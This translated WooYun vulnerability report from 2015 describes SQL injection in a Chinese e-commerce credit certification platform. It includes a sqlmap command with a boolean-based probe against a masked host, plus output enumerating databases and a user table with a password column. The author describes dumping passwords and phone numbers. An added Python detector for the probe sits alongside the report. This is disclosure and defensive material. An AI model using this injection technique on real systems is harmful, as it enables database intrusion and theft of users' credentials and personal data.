
Vulnerability summary

Defect ID: wooyun-2015-0145020

Title: China E-commerce Credit Certification Platform SQL injection / large-scale information disclosure

Vendor: China E-commerce Credit Certification Platform (中国电子商务信用认证平台)

Author: 冷白开。

Submitted: 2015-10-06 15:48

Fixed: 2015-11-26 10:56

Published: 2015-11-26 10:56

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-10-06: Details sent to the vendor, awaiting vendor handling
2015-10-12: Vendor confirmed; details disclosed to the vendor only
2015-10-22: Details disclosed to core white hats and domain experts
2015-11-01: Details disclosed to regular white hats
2015-11-11: Details disclosed to intern white hats
2015-11-26: Details disclosed to the public

Brief description:

SQL injection in the China E-commerce Credit Certification Platform, leading to large-scale information disclosure.

Detailed description:

Injection point: sqlmap.py -u "https://**.**.**.**//entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d6%20AND%20204%3d204" --dbs
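Added example, not part of the original report: a small Python detector for the boolean-based probe shape used above (userId=1 AND 3*2*1=6 AND 204=204), run over constructed access-log lines. It flags tautology expressions in URL-decoded query parameters and then pairs probes from the same client whose response sizes differ, the true/false split that blind boolean injection relies on. IP addresses, timestamps and byte counts are constructed, and the log format is assumed to be the common combined format.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines (not from the report). The first two requests copy the
# probe shape used against entry.php: a true condition (3*2*1=6) then a false one (3*2*1=7).
SAMPLE_LOG = """\
203.0.113.5 - - [06/Oct/2015:15:40:01 +0800] "GET /entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d6%20AND%20204%3d204 HTTP/1.1" 200 1532
203.0.113.5 - - [06/Oct/2015:15:40:02 +0800] "GET /entry.php?action=getUserinfo2&userId=1%20AND%203*2*1%3d7%20AND%20204%3d204 HTTP/1.1" 200 87
198.51.100.9 - - [06/Oct/2015:15:41:10 +0800] "GET /entry.php?action=getUserinfo2&userId=42 HTTP/1.1" 200 1490
"""

REQUEST_RE = re.compile(  # assumed combined log format: ip, ident, user, [ts], "req", status, size
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
    r' (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Boolean tautology probe: "AND <arithmetic expression> = <number>", e.g. "AND 3*2*1=6"
# or "AND 204=204"; matched against the percent-decoded parameter value.
BOOL_PROBE_RE = re.compile(r"\bAND\s+[\d*+\-\s]+\s*=\s*\d+", re.IGNORECASE)

def inspect_request(target):
    """Return [(param, decoded_value)] for query parameters carrying a probe."""
    query = urlparse(target).query
    findings = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:  # parse_qs already percent-decodes (%20, %3d, ...)
            if BOOL_PROBE_RE.search(value):
                findings.append((name, value))
    return findings

def scan_log(text):
    """Parse each log line and emit one alert dict per suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for param, value in inspect_request(m.group("target")):
            alerts.append({"ip": m.group("ip"), "param": param, "value": value,
                           "status": m.group("status"), "size": m.group("size")})
    return alerts

def differential_probes(alerts):
    """Group alerts by (ip, param) and keep groups whose response sizes differ:
    a true/false size split is the signature of a boolean-based blind test."""
    sizes = {}
    for a in alerts:
        sizes.setdefault((a["ip"], a["param"]), set()).add(a["size"])
    return {key: s for key, s in sizes.items() if len(s) > 1}
```

The durable fix on the application side is a parameterised query for userId (and an integer cast before it reaches SQL); the detector above only makes the probing visible in existing logs.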

[Screenshot: 1.png]

19 databases are affected:

available databases [19]:
[*] accesslog
[*] company
[*] cxt
[*] cxt_cert
[*] dede53
[*] information_schema
[*] joyinweb
[*] mysql
[*] performance_schema
[*] phpcms
[*] phpmyvisites
[*] piwik
[*] rdfocus
[*] szfw2
[*] szfw2_call
[*] test
[*] textpattern
[*] tikiwiki
[*] typecho
Database: szfw2
[140 tables]
Database: szfw2
Table: sys_user
[23 columns]
+-----------------+---------------------+
| Column | Type |
+-----------------+---------------------+
| agent_id | int(5) unsigned |
| create_time | timestamp |
| create_uid | int(11) unsigned |
| dept_name | varchar(16) |
| e_name | varchar(8) |
| e_uid | int(8) unsigned |
| finance_no | varchar(64) |
| finance_uid | int(11) unsigned |
| is_del | tinyint(3) unsigned |
| is_finance | tinyint(4) |
| is_lock | int(3) unsigned |
| last_login_time | datetime |
| login_count | int(11) unsigned |
| phone | varchar(20) |
| sort_index | int(11) |
| tel | varchar(20) |
| update_time | timestamp |
| update_uid | int(11) unsigned |
| user_id | int(11) unsigned |
| user_name | varchar(16) |
| user_no | varchar(48) |
| user_pwd | varchar(64) |
| user_remark | varchar(256) |
+-----------------+---------------------+
Database: szfw2
Table: sys_user
[58 entries]
+----------------------------------+
| user_pwd |
+----------------------------------+
+----------------------------------+
Database: szfw2
Table: sys_user
[267 entries]
+----------+
| e_name |
+----------+
[13:36:59] [WARNING] console output will be trimmed due to the large table size
+----------+

I did not finish dumping most of it, because sqlmap could not hold it all..... a few screenshots of the process:

[Screenshot: 2.png]

A few phone numbers:

[Screenshot: 4.png]

A pile of passwords... dizzying to look at.

Proof of vulnerability:

As above.

Fix recommendation:

You know what to do.

Copyright notice: please credit 冷白开。@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-10-12 10:54

Vendor reply:

CNVD has confirmed and reproduced the described issue. CNVD has notified the site operator by e-mail through the public contact channel on its website, and the operator will provide a fix subsequently.

Latest status:

None yet